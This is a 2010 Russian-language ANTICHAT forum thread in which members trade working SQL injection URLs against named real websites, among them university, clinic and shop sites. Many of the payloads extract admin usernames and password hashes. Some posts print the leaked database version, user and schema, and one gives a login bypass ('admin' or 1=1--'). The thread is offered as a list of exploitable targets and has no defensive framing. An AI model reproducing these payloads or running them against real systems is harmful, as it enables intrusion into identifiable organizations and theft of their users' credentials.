HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.11.2010, 15:45
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

http://www.fsts.ac.ma/fsts/listeannuaires.php?idrubrique=-11+and+1=2+union+select+1,concat(@@version,0x20,us er(),database(),0x20,@@version_compile_os),3,4,5,6 ,7,8,9,10,11,12--

5.1.47 root@localhostouahainf_fsts redhat-linux-gnu
 
Ответить с цитированием

  #2  
Старый 14.11.2010, 17:50
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.coralclubes.com/informacion_general.php?id=02+and+1=0+union+select +1,group_concat(username,char(58),password),3,4,5, 6,7+from+admin_usuarios

http://www.maranathafc.tg/template.php?page=detail_infos&id=432+and+1=2+unio n+select+1,group_concat(login,char(58),password),3 ,4,5,6+from+user

http://www.eortologio.gr/data/bios.php/?id=614+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16+from+msysaccessobjects

http://wellunic.hu/content.php?id=19;select+version()::int,2+from+pg_ user--

http://elizabethnardo.hu/index.php?mode=menyasszony_hirek&cikk_id=95+and+1= 0+union+select+1,2,3,concat_ws(0x3a,h_name,h_passw ),5,6,7,8+from+hirlevel

http://rugs.hu/?pg=product&id=1469'+or+(1,1)=(select+count(0),con cat((select+concat(substring(nick,1,64),char(58),s ubstring(pass,1,64))+from+admin+limit+0,1),floor(r and(0)*2))from(information_schema.tables)+group+by +2)--+

http://letoltokozpont.hu/letoltes_programok_reszletes.php?a=2546+or+(1,1)=( select+count(0),concat((select+version()+from+info rmation_schema.tables+limit+0,1),floor(rand(0)*2)) from(information_schema.tables)+group+by+2)--+%20&k=11

------------------------

SQLite

http://www.citytv.hu/musor_reszletezo.php?fk=17&mk=833&ms=1600&dt=20101 114+union+select+sqlite_version()-- (вывода нет, так как одна калонка,и его не видать)

обход авторизации форума

http://www.citytv.hu/musor_reszletezo.php

username - admin' or 1=1--

password - любой пасс
 
Ответить с цитированием

  #3  
Старый 14.11.2010, 21:19
JohnnyBGoode
Guest
Сообщений: n/a
Провел на форуме:
8669

Репутация: 5
По умолчанию

http://www.foto2web.ru/category-views.php?cat_id_name=6+union+select+1,2,3,4,5,con cat_ws(0x3a,version(),database(),user()),7,8,9,10, 11,12,13,14,15,16+--+

5.0.90:foto2web@localhost:foto2web


http://bestin-art.ru/view_desktop.php?cat=15'+and+1=0+union+select+1,2, concat_ws(0x3a,version(),database(),user()),4,5,6, 7,8,9+--+

5.1.36 :bestin@localhost:bestin
 
Ответить с цитированием

  #4  
Старый 15.11.2010, 00:50
moodoone
Новичок
Регистрация: 21.10.2009
Сообщений: 27
Провел на форуме:
815635

Репутация: 16
Отправить сообщение для moodoone с помощью ICQ
По умолчанию

Код:
Code:
http://hottur.org.ua/infrastruktura.php?id=-22+union+select+1,2,concat_ws%280x3a,login,password%29,4+from+auth--
/admin/admin.php

Смотрите портфолио разработчика. Почти все сайты уязвимы
 
Ответить с цитированием

  #5  
Старый 15.11.2010, 19:21
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

Сборочка

finexshop.ru тИЦ — 10 PR — 4

Код:
Code:
http://www.finexshop.ru/isp.php?iid=-121815+union+select+111,database()+--+&page=1&goods=397722
secure.pratt.duke.edu

Код:
Code:
http://secure.pratt.duke.edu/pratt_press/web.php?sid=169&iid=-20'+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9,10,11+from+10ch.users+--+
transport-industry.com тИЦ — 10 PR — 4

Код:
Code:
http://www.transport-industry.com/distributors-ru.html?&L=5&tx_nicosdirectory_pi1%5Bmode%5D=liste&tx_nicosdirectory_pi1%5Bmodifier%5D=cat&tx_nicosdirectory_pi1%5Bvalue%5D=-6'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+--+&tx_nicosdirectory_pi1%5Bpointer%5D=0&cHash=63294a3162
durlach.dlrg.de PR — 1

Код:
Code:
http://durlach.dlrg.de/gr/verein/termine/termine-detail.html?tx_dlrgterminkalender_pi1%5Baction%5D=read&tx_dlrgterminkalender_pi1%5Btid%5D=-74+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),13,14,15,16+--+&cHash=4ccffcd4fab1dcc4c3bbe3a3882a18d5
songhai.org тИЦ — 10 PR — 5

Код:
Code:
http://www.songhai.org/index.php?option=com_content&view=article&id=82+union+select+user(),222,333+--+:commercialisation&catid=60':commercialisation
uniklinik-ulm.de тИЦ — 10 PR — 6

Код:
Code:
http://www.uniklinik-ulm.de/service/aktuelles/veranstaltungen/teaser-detailansicht.html?eventid=-441+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+--+&cHash=6904a6d892
apostolic.edu тИЦ — 10 PR — 3

Код:
Code:
http://www.apostolic.edu/download.php?cmd=detail&&startLib=-00000000000000000000000000000000000000000000000030'+union+select+1,group_concat(table_name),3+from+information_schema.tables+group+by+table_schema+--+&startCat=00000000000000000000000000000000000000000000000180&fid=00000000000000000000000000000000000000000000003007
math.niu.edu тИЦ — 50 PR — 6

Код:
Code:
http://www.math.niu.edu/grad/index.php?cmd=detail&id=-480'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,concat_Ws(0x3a3a,uname,pwd,super),24,25,26,27,28+from+inventory.users+--+
mrbunker.ru тИЦ — 40 PR — 4

Код:
Code:
http://www.mrbunker.ru/index.php?id=2&nid=-60+UNioN/**/+/**/SElEct+1,2,3,4,5,group_concat(table_name),7,8,9,10+from+information_schema.tables+--+
samjicorp.co.kr

Код:
Code:
http://www.samjicorp.co.kr/bbs/view.html?id=-31521+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13+--+
hgn.de тИЦ — 10 PR — 3

Код:
Code:
http://www.hgn.de/index.php?inhalt=Presse&id=-369'+union+select+1,2,3,4,concat_ws(0x3a3a,admin,vorname,nachname,email,passwort)+from+user+--+
pcsoft.de тИЦ — 10 PR — 4

Код:
Code:
http://www.pcsoft.de/?id=glossar&L=1&tx_a21glossary%5Buid%5D=63+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+/*+&tx_a21glossary%5Bback%5D=36&cHash=4f53095717
 
Ответить с цитированием

  #6  
Старый 15.11.2010, 23:07
moodoone
Новичок
Регистрация: 21.10.2009
Сообщений: 27
Провел на форуме:
815635

Репутация: 16
Отправить сообщение для moodoone с помощью ICQ
По умолчанию

Код:
Code:
http://www.autovirag.dp.ua/product_by_kind.php?id=-62+unIon+select+1,2,version%28%29,4--
 
Ответить с цитированием

  #7  
Старый 16.11.2010, 02:59
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

harpandaltar.com

PR 5

Код:
Code:
http://www.harpandaltar.com/interior.php?t=s&i=3&p=26&e=-48+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8--
 
Ответить с цитированием

  #8  
Старый 16.11.2010, 03:17
DeepBlue7
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме:
390073

Репутация: 44
По умолчанию

Код:
Code:
http://www.quadrantkindercentra.nl/kind.php?id=2+union+select+1,2,3,concat_ws(0x2f,UserName,UserPass,UserEmail),5,6,7,8,9+from+users+limit+1,1--
admin_quadrant@localhost/5.1.52-community-log/admin_quadrant

Вывод в заголовке.

=============

Код:
Code:
http://www.waltonspianos.com/products/kind.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x2f,version(),user(),database())--
5.0.83-log/waltonsp_ianos@boscgi1202.eigbox.net/waltonsp_db

=============

Код:
Code:
http://www.gitaristu.ru/bands/name.php?id=4+union+select+concat_ws(0x2f,username,user_password),2,3,4,5+from+phpbb_users+limit+1,1--
5.1.52/gitaristu@localhost/gitaristu
 
Ответить с цитированием

  #9  
Старый 18.11.2010, 21:18
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

lee.edu

PR - 6

Код:
Code:
http://www.lee.edu/ce/news_descr.asp?ID=-55+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8--
 
Ответить с цитированием

  #10  
Старый 19.11.2010, 00:20
ra0cg
Участник форума
Регистрация: 09.11.2008
Сообщений: 206
Провел на форуме:
1638275

Репутация: 539
Отправить сообщение для ra0cg с помощью ICQ
По умолчанию

Код:
Code:
http://www.novo-med.ru/index.php?id=2+and+1=0+UNION+SELECT+1,concat_ws(0x3a,database(),user(),version()),3,4,5--
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ